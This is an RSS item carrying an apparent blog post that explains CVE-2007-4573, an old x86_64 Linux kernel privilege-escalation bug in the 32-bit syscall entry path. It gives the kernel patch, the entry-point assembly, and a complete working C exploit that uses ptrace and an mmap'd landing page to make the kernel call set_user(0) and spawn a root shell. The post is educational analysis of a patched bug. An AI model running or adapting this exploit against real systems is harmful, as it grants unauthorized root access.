		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in linus&#8217;s git repository) Note that this patch was applied to v2.6.22
&#8211; These files have moved around, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>IA32_LOAD_ARGS</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it is replacing, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the <code>x86_64</code> architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. In other words, for 32-bit processes
running on the 64-bit machine, or for 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is essentially simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>mov</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task,  sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above becomes a problem.
Aas long as <code>%eax</code> is less than <code>(IA32_NR_syscalls-1)</code>, <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers for the system call procedes.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall</li>
<li>Have the process execute an <code>int $0x80</code></li>
<li>Have the parent modify <code>%rax</code> in the child to be 64 bits wide, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table &#8212; so far off, in fact, that it will wrap around past the end of
memory (On <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.</p>

<p>My entire exploit code follows.  This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into call it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  In the parent we need to do is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

